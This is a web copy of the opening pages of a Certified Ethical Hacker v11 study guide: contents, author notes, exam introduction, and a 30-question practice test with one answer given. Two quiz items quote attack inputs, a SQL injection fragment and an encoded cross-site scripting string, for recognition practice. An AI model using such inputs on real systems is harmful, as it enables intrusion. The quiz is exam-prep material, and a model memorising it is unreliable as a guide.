CEH v11 Certified Ethical Hacker Study Guide [1 ed.] - EBIN ...


Research, identification, and selection of targets. Pairing remote access malware with exploit into a deliverable payload (e.g., Adobe PDF and Microsoft Office ...

CEH v11 Certified Ethical Hacker Study Guide [1 ed.]
ISBN 1119800285, 9781119800286
As protecting information continues to be a growing concern for today's businesses, certifications in IT security have b
English, 704 pages [701], year 2021, 28 MB

Table of contents:
Cover; Title Page; Copyright Page; About the Author; Contents at a Glance; Contents
Introduction: What Is a CEH?; The Subject Matter; About the Exam; Who Is Eligible; Exam Cost; About EC-Council; Using This Book; Objective Map; Let's Get Started!
Assessment Test; Answers to Assessment Test
Chapter 1 Ethical Hacking: Overview of Ethics; Overview of Ethical Hacking; Methodologies; Cyber Kill Chain; Attack Lifecycle; Methodology of Ethical Hacking; Reconnaissance and Footprinting; Scanning and Enumeration; Gaining Access; Maintaining Access; Covering Tracks; Summary
Chapter 2 Networking Foundations: Communications Models; Open Systems Interconnection; TCP/IP Architecture; Topologies; Bus Network; Star Network; Ring Network; Mesh Network; Hybrid; Physical Networking; Addressing; Switching; IP; Headers; Addressing; Subnets; TCP; UDP; Internet Control Message Protocol; Network Architectures; Network Types; Isolation; Remote Access; Cloud Computing; Storage as a Service; Infrastructure as a Service; Platform as a Service; Software as a Service; Internet of Things; Summary; Review Questions
Chapter 3 Security Foundations: The Triad; Confidentiality; Integrity; Availability; Parkerian Hexad; Risk; Policies, Standards, and Procedures; Security Policies; Security Standards; Procedures; Guidelines; Organizing Your Protections; Security Technology; Firewalls; Intrusion Detection Systems; Intrusion Prevention Systems; Endpoint Detection and Response; Security Information and Event Management; Being Prepared; Defense in Depth; Defense in Breadth; Defensible Network Architecture; Logging; Auditing; Summary; Review Questions
Chapter 4 Footprinting and Reconnaissance: Open Source Intelligence; Companies; People; Social Networking; Domain Name System; Name Lookups; Zone Transfers; Passive DNS; Passive Reconnaissance; Website Intelligence; Technology Intelligence; Google Hacking; Internet of Things (IoT); Summary; Review Questions
Chapter 5 Scanning Networks: Ping Sweeps; Using fping; Using MegaPing; Port Scanning; Nmap; masscan; MegaPing; Metasploit; Vulnerability Scanning; OpenVAS; Nessus; Looking for Vulnerabilities with Metasploit; Packet Crafting and Manipulation; hping; packETH; fragroute; Evasion Techniques; Protecting and Detecting; Summary; Review Questions
Chapter 6 Enumeration: Service Enumeration; Remote Procedure Calls; SunRPC; Remote Method Invocation; Server Message Block; Built-in Utilities; nmap Scripts; NetBIOS Enumerator; Metasploit; Other Utilities; Simple Network Management Protocol; Simple Mail Transfer Protocol; Web-Based Enumeration; Summary; Review Questions
Chapter 7 System Hacking: Searching for Exploits; System Compromise; Metasploit Modules; Exploit-DB; Gathering Passwords; Password Cracking; John the Ripper; Rainbow Tables; Kerberoasting; Client-Side Vulnerabilities; Living Off the Land; Fuzzing; Post Exploitation; Evasion; Privilege Escalation; Pivoting; Persistence; Covering Tracks; Summary; Review Questions
Chapter 8 Malware: Malware Types; Virus; Worm; Trojan; Botnet; Ransomware; Dropper; Malware Analysis; Static Analysis; Dynamic Analysis; Creating Malware; Writing Your Own; Using Metasploit; Obfuscating; Malware Infrastructure; Antivirus Solutions; Persistence; Summary; Review Questions
Chapter 9 Sniffing: Packet Capture; tcpdump; tshark; Wireshark; Berkeley Packet Filter; Port Mirroring/Spanning; Packet Analysis; Spoofing Attacks; ARP Spoofing; DNS Spoofing; sslstrip; Spoofing Detection; Summary; Review Questions
Chapter 10 Social Engineering: Social Engineering; Pretexting; Social Engineering Vectors; Physical Social Engineering; Badge Access; Man Traps; Biometrics; Phone Calls; Baiting; Phishing Attacks; Website Attacks; Cloning; Rogue Attacks; Wireless Social Engineering; Automating Social Engineering; Summary; Review Questions
Chapter 11 Wireless Security: Wi-Fi; Wi-Fi Network Types; Wi-Fi Authentication; Wi-Fi Encryption; Bring Your Own Device; Wi-Fi Attacks; Bluetooth; Scanning; Bluejacking; Bluesnarfing; Bluebugging; Mobile Devices; Mobile Device Attacks; Summary; Review Questions
Chapter 12 Attack and Defense: Web Application Attacks; XML External Entity Processing; Cross-Site Scripting; SQL Injection; Command Injection; File Traversal; Web Application Protections; Denial-of-Service Attacks; Bandwidth Attacks; Slow Attacks; Legacy; Application Exploitation; Buffer Overflow; Heap Spraying; Application Protections and Evasions; Lateral Movement; Defense in Depth/Defense in Breadth; Defensible Network Architecture; Summary; Review Questions
Chapter 13 Cryptography: Basic Encryption; Substitution Ciphers; Diffie-Hellman; Symmetric Key Cryptography; Data Encryption Standard; Advanced Encryption Standard; Asymmetric Key Cryptography; Hybrid Cryptosystem; Nonrepudiation; Elliptic Curve Cryptography; Certificate Authorities and Key Management; Certificate Authority; Trusted Third Party; Self-Signed Certificates; Cryptographic Hashing; PGP and S/MIME; Disk and File Encryption; Summary; Review Questions
Chapter 14 Security Architecture and Design: Data Classification; Security Models; State Machine; Biba; Bell-LaPadula; Clark-Wilson Integrity Model; Application Architecture; n-tier Application Design; Service-Oriented Architecture; Cloud-Based Applications; Database Considerations; Security Architecture; Summary; Review Questions
Chapter 15 Cloud Computing and the Internet of Things: Cloud Computing Overview; Cloud Services; Shared Responsibility Model; Public vs. Private Cloud; Cloud Architectures and Deployment; Responsive Design; Cloud-Native Design; Deployment; Dealing with REST; Common Cloud Threats; Access Management; Data Breach; Web Application Compromise; Credential Compromise; Insider Threat; Internet of Things; Operational Technology; Summary; Review Questions
Appendix Answers to Review Questions: Chapter 2: Networking Foundations; Chapter 3: Security Foundations; Chapter 4: Footprinting and Reconnaissance; Chapter 5: Scanning Networks; Chapter 6: Enumeration; Chapter 7: System Hacking; Chapter 8: Malware; Chapter 9: Sniffing; Chapter 10: Social Engineering; Chapter 11: Wireless Security; Chapter 12: Attack and Defense; Chapter 13: Cryptography; Chapter 14: Security Architecture and Design; Chapter 15: Cloud Computing and the Internet of Things
Index; Comprehensive Online Learning Environment; Register and Access the Online Test Bank; EULA
CEH v11 Certified Ethical Hacker Study Guide
Ric Messier, CEH, GSEC, CISSP

Copyright © 2021 by John Wiley & Sons, Inc. All rights reserved.
Published by John Wiley & Sons, Inc., Hoboken, New Jersey.
Published simultaneously in Canada.
ISBN: 978-1-119-80028-6
ISBN: 978-1-119-80029-3 (ebk)
ISBN: 978-1-119-80030-9 (ebk)

No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning, or otherwise, except as permitted under Section 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, Inc., 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 750-4470, or on the web at www.copyright.com. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at http://www.wiley.com/go/permission.

Limit of Liability/Disclaimer of Warranty: While the publisher and author have used their best efforts in preparing this book, they make no representations or warranties with respect to the accuracy or completeness of the contents of this book and specifically disclaim any implied warranties of merchantability or fitness for a particular purpose. No warranty may be created or extended by sales representatives or written sales materials. The advice and strategies contained herein may not be suitable for your situation. You should consult with a professional where appropriate. Neither the publisher nor author shall be liable for any loss of profit or any other commercial damages, including but not limited to special, incidental, consequential, or other damages.

For general information on our other products and services or for technical support, please contact our Customer Care Department within the United States at (800) 762-2974, outside the United States at (317) 572-3993 or fax (317) 572-4002.

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may not be available in electronic formats. For more information about Wiley products, visit our website at www.wiley.com.

Library of Congress Control Number: 2021939941

TRADEMARKS: WILEY and the Wiley logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CEH is a trademark of EC-Council. All other trademarks are the property of their respective owners. John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.

Cover image: © Getty Images Inc./Jeremy Woodhouse
Cover design: Wiley

For Robin, the inspirational light in my life.

About the Author

Ric Messier, GCIH, CCSP, GSEC, CEH, CISSP, MS, has entirely too many letters after his name, as though he spends time gathering up strays that follow him home at the end of the day. His interest in information security began in high school but was cemented when he was a freshman at the University of Maine, Orono, when he took advantage of a vulnerability in a jailed environment to break out of the jail and gain elevated privileges on an IBM mainframe in the early 1980s. His first experience with Unix was in the mid-1980s and with Linux in the mid-1990s. Ric is an author, trainer, educator, and security professional with multiple decades of experience. He is currently a Principal Consultant with FireEye Mandiant and occasionally teaches courses at Harvard University.

About the Technical Editor

Erin O'Brien is currently a security consultant at Mandiant, where she focuses on incident response and threat intelligence. She has over 7 years of experience in the information technology industry, with specialties in vulnerability management, security engineering, and data loss prevention.

Contents at a Glance

Introduction xix
Assessment Test xxvi
Chapter 1 Ethical Hacking 1
Chapter 2 Networking Foundations 15
Chapter 3 Security Foundations 57
Chapter 4 Footprinting and Reconnaissance 97
Chapter 5 Scanning Networks 155
Chapter 6 Enumeration 221
Chapter 7 System Hacking 263
Chapter 8 Malware 319
Chapter 9 Sniffing 367
Chapter 10 Social Engineering 407
Chapter 11 Wireless Security 439
Chapter 12 Attack and Defense 479
Chapter 13 Cryptography 515
Chapter 14 Security Architecture and Design 547
Chapter 15 Cloud Computing and the Internet of Things 573
Appendix Answers to Review Questions 617
Index 649

Contents

Introduction xix
Assessment Test xxvi
Chapter 1 Ethical Hacking 1: Overview of Ethics 2; Overview of Ethical Hacking 5; Methodologies 6; Cyber Kill Chain 6; Attack Lifecycle 8; Methodology of Ethical Hacking 10; Reconnaissance and Footprinting 10; Scanning and Enumeration 11; Gaining Access 11; Maintaining Access 12; Covering Tracks 12; Summary 13
Chapter 2 Networking Foundations 15: Communications Models 17; Open Systems Interconnection 18; TCP/IP Architecture 21; Topologies 22; Bus Network 22; Star Network 23; Ring Network 24; Mesh Network 25; Hybrid 26; Physical Networking 27; Addressing 27; Switching 28; IP 29; Headers 29; Addressing 31; Subnets 33; TCP 34; UDP 38; Internet Control Message Protocol 39; Network Architectures 40; Network Types 40; Isolation 41; Remote Access 43; Cloud Computing 44; Storage as a Service 45; Infrastructure as a Service 46; Platform as a Service 48; Software as a Service 49; Internet of Things 51; Summary 52; Review Questions 54
Chapter 3 Security Foundations 57: The Triad 59; Confidentiality 59; Integrity 61; Availability 62; Parkerian Hexad 63; Risk 64; Policies, Standards, and Procedures 66; Security Policies 66; Security Standards 67; Procedures 68; Guidelines 68; Organizing Your Protections 69; Security Technology 72; Firewalls 72; Intrusion Detection Systems 77; Intrusion Prevention Systems 80; Endpoint Detection and Response 81; Security Information and Event Management 83; Being Prepared 84; Defense in Depth 84; Defense in Breadth 86; Defensible Network Architecture 87; Logging 88; Auditing 90; Summary 92; Review Questions 93
Chapter 4 Footprinting and Reconnaissance 97: Open Source Intelligence 99; Companies 99; People 108; Social Networking 111; Domain Name System 124; Name Lookups 125; Zone Transfers 130; Passive DNS 133; Passive Reconnaissance 136; Website Intelligence 139; Technology Intelligence 144; Google Hacking 144; Internet of Things (IoT) 146; Summary 148; Review Questions 150
Chapter 5 Scanning Networks 155: Ping Sweeps 157; Using fping 157; Using MegaPing 159; Port Scanning 161; Nmap 162; masscan 176; MegaPing 178; Metasploit 180; Vulnerability Scanning 183; OpenVAS 184; Nessus 196; Looking for Vulnerabilities with Metasploit 202; Packet Crafting and Manipulation 203; hping 204; packETH 207; fragroute 209; Evasion Techniques 211; Protecting and Detecting 214; Summary 215; Review Questions 217
Chapter 6 Enumeration 221: Service Enumeration 223; Remote Procedure Calls 226; SunRPC 226; Remote Method Invocation 228; Server Message Block 232; Built-in Utilities 233; nmap Scripts 237; NetBIOS Enumerator 239; Metasploit 240; Other Utilities 242; Simple Network Management Protocol 245; Simple Mail Transfer Protocol 247; Web-Based Enumeration 250; Summary 257; Review Questions 259
Chapter 7 System Hacking 263: Searching for Exploits 265; System Compromise 269; Metasploit Modules 270; Exploit-DB 274; Gathering Passwords 276; Password Cracking 279; John the Ripper 280; Rainbow Tables 282; Kerberoasting 284; Client-Side Vulnerabilities 289; Living Off the Land 291; Fuzzing 292; Post Exploitation 295; Evasion 295; Privilege Escalation 296; Pivoting 301; Persistence 304; Covering Tracks 307; Summary 313; Review Questions 315
Chapter 8 Malware 319: Malware Types 321; Virus 321; Worm 323; Trojan 324; Botnet 324; Ransomware 326; Dropper 328; Malware Analysis 328; Static Analysis 329; Dynamic Analysis 340; Creating Malware 349; Writing Your Own 350; Using Metasploit 353; Obfuscating 356; Malware Infrastructure 357; Antivirus Solutions 359; Persistence 360; Summary 361; Review Questions 363
Chapter 9 Sniffing 367: Packet Capture 368; tcpdump 369; tshark 376; Wireshark 378; Berkeley Packet Filter 382; Port Mirroring/Spanning 384; Packet Analysis 385; Spoofing Attacks 390; ARP Spoofing 390; DNS Spoofing 394; sslstrip 397; Spoofing Detection 398; Summary 399; Review Questions 402
Chapter 10 Social Engineering 407: Social Engineering 408; Pretexting 410; Social Engineering Vectors 412; Physical Social Engineering 413; Badge Access 413; Man Traps 415; Biometrics 416; Phone Calls 417; Baiting 418; Phishing Attacks 418; Website Attacks 422; Cloning 423; Rogue Attacks 426; Wireless Social Engineering 427; Automating Social Engineering 430; Summary 433; Review Questions 435
Chapter 11 Wireless Security 439: Wi-Fi 440; Wi-Fi Network Types 442; Wi-Fi Authentication 445; Wi-Fi Encryption 446; Bring Your Own Device 450; Wi-Fi Attacks 451; Bluetooth 462; Scanning 463; Bluejacking 465; Bluesnarfing 466; Bluebugging 466; Mobile Devices 466; Mobile Device Attacks 467; Summary 472; Review Questions 474
Chapter 12 Attack and Defense 479: Web Application Attacks 480; XML External Entity Processing 482; Cross-Site Scripting 483; SQL Injection 485; Command Injection 487; File Traversal 489; Web Application Protections 490; Denial-of-Service Attacks 492; Bandwidth Attacks 492; Slow Attacks 495; Legacy 497; Application Exploitation 497; Buffer Overflow 498; Heap Spraying 500; Application Protections and Evasions 501; Lateral Movement 502; Defense in Depth/Defense in Breadth 504; Defensible Network Architecture 506; Summary 508; Review Questions 510
Chapter 13 Cryptography 515: Basic Encryption 517; Substitution Ciphers 517; Diffie-Hellman 520; Symmetric Key Cryptography 521; Data Encryption Standard 522; Advanced Encryption Standard 523; Asymmetric Key Cryptography 524; Hybrid Cryptosystem 525; Nonrepudiation 525; Elliptic Curve Cryptography 526; Certificate Authorities and Key Management 528; Certificate Authority 528; Trusted Third Party 531; Self-Signed Certificates 532; Cryptographic Hashing 534; PGP and S/MIME 536; Disk and File Encryption 538; Summary 541; Review Questions 543
Chapter 14 Security Architecture and Design 547: Data Classification 548; Security Models 550; State Machine 550; Biba 551; Bell-LaPadula 552; Clark-Wilson Integrity Model 552; Application Architecture 553; n-tier Application Design 554; Service-Oriented Architecture 557; Cloud-Based Applications 559; Database Considerations 561; Security Architecture 563; Summary 567; Review Questions 569
Chapter 15 Cloud Computing and the Internet of Things 573: Cloud Computing Overview 574; Cloud Services 578; Shared Responsibility Model 583; Public vs. Private Cloud 585; Cloud Architectures and Deployment 586; Responsive Design 588; Cloud-Native Design 589; Deployment 590; Dealing with REST 593; Common Cloud Threats 598; Access Management 598; Data Breach 600; Web Application Compromise 600; Credential Compromise 602; Insider Threat 604; Internet of Things 604; Operational Technology 610; Summary 612; Review Questions 614
Appendix Answers to Review Questions 617: Chapter 2: Networking Foundations 618; Chapter 3: Security Foundations 619; Chapter 4: Footprinting and Reconnaissance 622; Chapter 5: Scanning Networks 624; Chapter 6: Enumeration 627; Chapter 7: System Hacking 629; Chapter 8: Malware 632; Chapter 9: Sniffing 635; Chapter 10: Social Engineering 636; Chapter 11: Wireless Security 638; Chapter 12: Attack and Defense 641; Chapter 13: Cryptography 643; Chapter 14: Security Architecture and Design 645; Chapter 15: Cloud Computing and the Internet of Things 646
Index 649

Introduction

You're thinking about becoming a Certified Ethical Hacker (CEH). No matter what variation of security testing you are performing—ethical hacking, penetration testing, red teaming, or application assessment—the skills and knowledge necessary to achieve this certification are in demand. Even the idea of security testing and ethical hacking is evolving as businesses and organizations begin to have a better understanding of the adversaries they are facing. It's no longer the so-called script kiddies that businesses felt they were fending off for so long. Today's adversary is organized, well-funded, and determined. This means testing requires different tactics.

Depending on who you are listening to, 80–90 percent of attacks today use social engineering. The old technique of looking for technical vulnerabilities in network services is simply not how attackers are getting into networks. Networks that are focused on applying a defense-in-depth approach, hardening the outside, may end up being susceptible to attacks from the inside, which is what happens when desktop systems are compromised. The skills needed to identify vulnerabilities and recommend remediations are evolving, along with the tactics and techniques used by attackers.

This book is written to help you understand the breadth of content you will need to know to obtain the CEH certification. You will find a lot of concepts to provide you a foundation that can be applied to the skills required for the certification. While you can read this book cover to cover, for a substantial chunk of the subjects getting hands-on experience is essential. The concepts are often demonstrated through the use of tools. Following along with these demonstrations and using the tools yourself will help you understand the tools and how to use them. Many of the demonstrations are done in Kali Linux, though many of the tools have Windows analogs if you are more comfortable there.

We can't get through this without talking about ethics, though you will find it mentioned in several places throughout the book. This is serious, and not only because it's a huge part of the basis for the certification. It's also essential for protecting yourself and the people you are working for. The short version is do not do anything that would cause damage to systems or your employer. There is much more to it than that, which you'll read more about in Chapter 1 as a starting point. It's necessary to start wrapping your head around the ethics involved in this exam and profession. You will have to sign an agreement as part of achieving your certification.

At the end of each chapter, you will find a set of questions. This will help you to demonstrate to yourself that you understand the content. Most of the questions are multiple choice, which is the question format used for the CEH exam. These questions, along with the hands-on experience you take advantage of, will be good preparation for taking the exam.

What Is a CEH?

The Certified Ethical Hacker exam is to validate that those holding the certification understand the broad range of subject matter that is required for someone to be an effective ethical hacker. The reality is that most days, if you are paying attention to the news, you will see a news story about a company that has been compromised and had data stolen, a government that has been attacked, or even enormous denial-of-service attacks, making it difficult for users to gain access to business resources.

The CEH is a certification that recognizes the importance of identifying security issues to get them remediated. This is one way companies can protect themselves against attacks—by getting there before the attackers do. It requires someone who knows how to follow techniques that attackers would normally use. Just running scans using automated tools is insufficient because as good as security scanners may be, they will identify false positives—cases where the scanner indicates an issue that isn't really an issue. Additionally, they will miss a lot of vulnerabilities—false negatives—for a variety of reasons, including the fact that the vulnerability or attack may not be known.

Because companies need to understand where they are vulnerable to attack, they need people who are able to identify those vulnerabilities, which can be very complex. Scanners are a good start, but being able to find holes in complex networks can take the creative intelligence that humans offer. This is why we need ethical hackers. These are people who can take extensive knowledge of a broad range of technical subjects and use it to identify vulnerabilities that can be exploited.

The important part of that two-word phrase, by the way, is "ethical." Companies have protections in place because they have resources they don't want stolen or damaged. When they bring in someone who is looking for vulnerabilities to exploit, they need to be certain that nothing will be stolen or damaged. They also need to be certain that anything that may be seen or reviewed isn't shared with anyone else. This is especially true when it comes to any vulnerabilities that have been identified.

The CEH exam, then, has a dual purpose. It not only tests deeply technical knowledge but also binds anyone who is a certification holder to a code of conduct. Not only will you be expected to know the content and expectations of that code of conduct, you will be expected to live by that code. When companies hire or contract to people who have their CEH certification, they can be assured they have brought on someone with discretion who can keep their secrets and provide them with professional service in order to help improve their security posture and keep their important resources protected.

The Subject Matter

If you were to take the CEH v11 training, you would have to go through the following modules:
■ Introduction to Ethical Hacking
■ Footprinting and Reconnaissance
■ Scanning Networks
■ Enumeration
■ Vulnerability Analysis
■ System Hacking
■ Malware Threats
■ Sniffing
■ Social Engineering
■ Denial of Service
■ Session Hijacking
■ Evading IDSs, Firewalls, and Honeypots
■ Hacking Web Servers
■ Hacking Web Applications
■ SQL Injection
■ Hacking Wireless Networks
■ Hacking Mobile Platforms
■ IoT Hacking
■ Cloud Computing
■ Cryptography

As you can see, the range of subjects is broad. Beyond knowing the concepts associated with these topics, you will be expected to know about various tools that may be used to perform the actions associated with the concepts you are learning. You will need to know tools like nmap for port scanning, for example. You may need to know proxy-based web application attack tools. For wireless network attacks, you may need to know about the aircrack-ng suite of tools. For every module listed, there are potentially dozens of tools that may be used.

The subject matter of the CEH exam is very technical. This is not a field in which you can get by with theoretical knowledge. You will need to have had experience with the methods and tools that are covered within the subject matter for the CEH exam. What you may also have noticed here is that the modules all fall within the different stages mentioned earlier. While you may not necessarily be asked for a specific methodology, you will find that the contents of the exam do generally follow the methodology that the EC-Council believes to be a standard approach.

About the Exam

The CEH exam has much the same parameters as other professional certification exams. You will take a computerized, proctored exam. You will have 4 hours to complete 125 questions. That means you will have, on average, roughly 2 minutes per question. The questions are all multiple choice. The exam can be taken through the ECC Exam Center or at a Pearson VUE center. For details about VUE, please visit https://www.vue.com/eccouncil.

Should you want to take your certification even further, you could go after the CEH Practical exam. For this exam you must perform an actual penetration test and write a report at the end of it. This demonstrates that in addition to knowing the body of material covered by the exam, you can put that knowledge to use in a practical way. You will be expected to know how to compromise systems and identify vulnerabilities.

To pass the exam, you will have to correctly answer a certain number of questions, though the actual number will vary. The passing grade varies depending on the difficulty of the questions asked. The harder the questions that are asked out of the complete pool of questions, the fewer questions you need to get right to pass the exam. If you get easier questions, you will need to get more of the questions right to pass. There are some sources of information that will tell you that you need to get 70 percent of the questions right, and that may be okay for general guidance and preparation as a rough low-end marker. However, keep in mind that when you sit down to take the actual test at the testing center, the passing grade will vary. The score you will need to achieve will range from 60 to 85 percent.

The good news is that you will know whether you passed before you leave the testing center. You will get your score when you finish the exam, and you will also get a piece of paper indicating the details of your grade. You will get feedback associated with the different scoring areas and how you performed in each of them.

Who Is Eligible

Not everyone is eligible to sit for the CEH exam. Before you go too far down the road, you should check your qualifications. Just as a starting point, you have to be at least 18 years of age. The other eligibility standards are as follows:
■ Anyone who has versions 1–7 of the CEH certification. The CEH certification is ANSI certified now, but early versions of the exam were available before the certification. Anyone who wants to take the ANSI-accredited certification who has the early version of the CEH certification can take the exam.
■ Minimum of two years of related work experience. Anyone who has the experience will have to pay a nonrefundable application fee of $100.
■ Have taken an EC-Council training.

If you meet these qualification standards, you can apply for the certification, along with paying the fee if it is applicable to you (if you take one of the EC-Council trainings, the fee is included). The application will be valid for three months.

Exam Cost

To take the certification exam, you need to pay for a Pearson VUE exam voucher. The cost of this is $1,199. You could also obtain an EC-Council voucher for $950, but that requires that you have taken EC-Council training and can provide a Certificate of Attendance.

EC-Council may change their eligibility, pricing, or exam policies from time to time. We highly encourage you to check for updated policies at the EC-Council website (https://cert.eccouncil.org/certified-ethical-hacker.html) when you begin studying for this book and again when you register for this exam.

About EC-Council

The International Council of Electronic Commerce Consultants is more commonly known as the EC-Council. It was created after the airplane attacks that happened against the United States on September 11, 2001. The founder, Jay Bavisi, wondered what would happen if the perpetrators of the attack decided to move from the kinetic world to the digital world. Even beyond that particular set of attackers, the Internet has become a host to a large number of people who are interested in causing damage or stealing information. The economics of the Internet, meaning the low cost of entry into the business, encourage criminals to use it as a means of stealing information, ransoming data, or other malicious acts.

The EC-Council is considered to be one of the largest certifying bodies in the world. It operates in 145 countries and has certified more than 200,000 people. In addition to the CEH, the EC-Council administers a number of other IT-related certifications:
■ Certified Network Defender (CND)
■ Certified Ethical Hacker (CEH)
■ Certified Ethical Hacker Practical
■ EC-Council Certified Security Analyst (ECSA)
■ EC-Council Certified Security Analyst Practical
■ Licensed Penetration Tester (LPT)
■ Computer Hacking Forensic Investigator (CHFI)
■ Certified Chief Information Security Officer (CCISO)

One advantage to holding a certification from the EC-Council is that the organization has been accredited by the American National Standards Institute (ANSI). Additionally, and perhaps more importantly for potential certification holders, the certifications from EC-Council are recognized worldwide and have been endorsed by governmental agencies like the National Security Agency (NSA). The Department of Defense Directive 8570 includes the CEH certification. This is important because having the CEH certification means that you could be quickly qualified for a number of positions with the United States government.

The CEH certification provides a bar. This means there is a set of known standards. To obtain the certification, you will need to have met at least the minimal standard. These standards can be relied on consistently. This is why someone with the CEH certification can be trusted. They have demonstrated that they have met known and accepted standards of both knowledge and professional conduct.

Using This Book

This book is structured in a way that foundational material is up front. With this approach, you can make your way in an orderly fashion through the book, one chapter at a time. Technical books can be dry and difficult to get through sometimes, but it's always my goal to try to make them easy to read and I hope entertaining along the way. If you already have a lot of experience, you don't need to take the direct route from beginning to end. You can skip around as you need. No chapter relies on any other. They all stand alone with respect to the content. However, if you don't have the foundation and try to jump to a later chapter, you may find yourself getting lost or confused by the material. All you need to do is jump back to some of the foundational chapters.

Beyond the foundational materials, the book generally follows a fairly standard methodology when it comes to performing security testing. This methodology will be further explained in Chapter 1. As a result, you can follow along with the steps of a penetration test/ethical hacking engagement. Understanding the outline and reason for the methodology will also be helpful to you. Again, though, if you know the material, you can move around as you need.

Objective Map

Table I.1 contains an objective map to show you at a glance where you can find each objective covered. While there are chapters listed for all of these, there are some objectives that are scattered throughout the book. Specifically, tools, systems, and programs get at least touched on in most of the chapters.

TABLE I.1 Objective Map

Objective                                   Chapter
Tasks
1.1 Systems development and management      7, 14
1.2 Systems analysis and audits             4, 5, 6, 7
1.3 Security testing and vulnerabilities    7, 8
1.4 Reporting                               1, 7
1.5 Mitigation                              7, 8
1.6 Ethics                                  1
Knowledge
2.1 Background                              2, 3
2.2 Analysis/assessment                     2, 11
2.3 Security                                3, 13, 14
2.4 Tools, systems, programs                4, 5, 6, 7
2.5 Procedures/methodology                  1, 4, 5, 6, 7, 14
2.6 Regulation/policy                       1, 14
2.7 Ethics                                  1

Let's Get Started!

This book is structured in a way that you will be led through foundational concepts and then through a general methodology for ethical hacking. You can feel free to select your own pathway through the book. Remember, wherever possible, get your hands dirty. Get some experience with tools, tactics, and procedures that you are less familiar with. It will help you a lot. Take the self-assessment. It may help you get a better idea of how you can make the best use of this book.

Assessment Test

1. Which header field is used to reassemble fragmented IP packets?
A. Destination address
B. IP identification
C. Don't fragment bit
D. ToS field

2. If you were to see the following in a packet capture, what would you expect was happening?
' or 1=1;
A. Cross-site scripting
B. Command injection
C. SQL injection
D. XML external entity injection

3. What method might you use to successfully get malware onto a mobile device?
A. Through the Apple Store or Google Play Store
B. External storage on an Android
C. Third-party app store
D. Jailbreaking

4. What protocol is used to take a destination IP address and get a packet to a destination on the local network?
A. DHCP
B. ARP
C. DNS
D. RARP

5. What would be the result of sending the string AAAAAAAAAAAAAAAAA into a variable that has been allocated space for 8 bytes?
A. Heap spraying
B. SQL injection
C. Buffer overflow
D. Slowloris attack

6. If you were to see the subnet mask 255.255.248.0, what CIDR notation (prefix) would you use to indicate the same thing?
A. /23
B. /22
C. /21
D. /20

7. What is the primary difference between a worm and a virus?
A. A worm uses polymorphic code.
B. A virus uses polymorphic code.
C. A worm can self-propagate.
D. A virus can self-propagate.

8. How would you calculate risk?
A. Probability * loss
B. Probability * mitigation factor
C. (Loss + mitigation factor) * (loss/probability)
D. Probability * mitigation factor

9. How does an evil twin attack work?
A. Phishing users for credentials
B. Spoofing an SSID
C. Changing an SSID
D. Injecting four-way handshakes

10. To remove malware in the network before it gets to the endpoint, you would use which of the following?
A. Antivirus
B. Application layer gateway
C. Unified threat management appliance
D. Stateful firewall

11. What is the purpose of a security policy?
A. Providing high-level guidance on the role of security
B. Providing specific direction to security workers
C. Increasing the bottom line of a company
D. Aligning standards and practices

12. What has been done to the following string?
%3Cscript%3Ealert('wubble');%3C/script%3E
A. Base64 encoding
B. URL encoding
C. Encryption
D. Cryptographic hashing

13. What would you get from running the command dig ns domain.com?
A. Mail exchanger records for domain.com
B. Name server records for domain.com
C. Caching name server for domain.com
D. IP address for the hostname ns

14. What technique would you ideally use to get all of the hostnames associated with a domain?
A. DNS query
B. Zone copy
C. Zone transfer
D. Recursive request

15. If you were to notice operating system commands inside a DNS request while looking at a packet capture, what might you be looking at?
A. Tunneling attack
B. DNS amplification
C. DNS recursion
D. XML entity injection

16. What would be the purpose of running a ping sweep?
A. You want to identify responsive hosts without a port scan.
B. You want to use something that is light on network traffic.
C. You want to use a protocol that may be allowed through the firewall.
D. All of the above.

17. How many functions are specified by NIST's cybersecurity framework?
A. 0
B. 3
C. 5
D. 4

18. What would be one reason not to write malware in Python?
A. The Python interpreter is slow.
B. The Python interpreter may not be available.
C. There is inadequate library support.
D. Python is a hard language to learn.

19. If you saw the following command line, what would you be capturing?
tcpdump -i eth2 host 192.168.10.5
A. Traffic just from 192.168.10.5
B. Traffic to and from 192.168.10.5
C. Traffic just to 192.168.10.5
D. All traffic other than from 192.168.86.5

20. What is Diffie-Hellman used for?
A. Key management
B. Key isolation
C. Key exchange
D. Key revocation

21. Which social engineering principle may allow a phony call from the help desk to be effective?
A. Social proof
B. Imitation
C. Scarcity
D. Authority

22. How do you authenticate with SNMPv1?
A. Username/password
B. Hash
C. Public string
D. Community string

23. What is the process Java programs identify themselves to if they are sharing procedures over the network?
A. RMI registry
B. RMI mapper
C. RMI database
D. RMI process

24. What do we call an ARP response without a corresponding ARP request?
A. Is-at response
B. Who-has ARP
C. Gratuitous ARP
D. IP response

25. What are the three times that are typically stored as part of file metadata?
A. Moves, adds, changes
B. Modified, accessed, deleted
C. Moved, accessed, changed
D. Modified, accessed, created
26. Which of these is a reason to use an exploit against a local vulnerability?
A. Pivoting
B. Log manipulation
C. Privilege escalation
D. Password collection

27. What principle is used to demonstrate that a signed message came from the owner of the key that signed it?
A. Nonrepudiation
B. Nonverifiability
C. Integrity
D. Authority

28. What is a viable approach to protecting against tailgating?
A. Biometrics
B. Badge access
C. Phone verification
D. Mantraps

29. Why is bluesnarfing potentially more dangerous than bluejacking?
A. Bluejacking sends, while bluesnarfing receives.
B. Bluejacking receives, while bluesnarfing sends.
C. Bluejacking installs keyloggers.
D. Bluesnarfing installs keyloggers.

30. Which of the security triad properties does the Biba security model relate to?
A. Confidentiality
B. Integrity
C. Availability
D. All of them

Answers to Assessment Test

1. B. The destination address is used as the address to send messages to. The don't fragment bit is used to tell network devices not to fragment the packet. The Type of Service (ToS) field can be used to perform quality of service. The IP identification field is used to identify fragments of the same packet, as they would all have the same IP identification number.

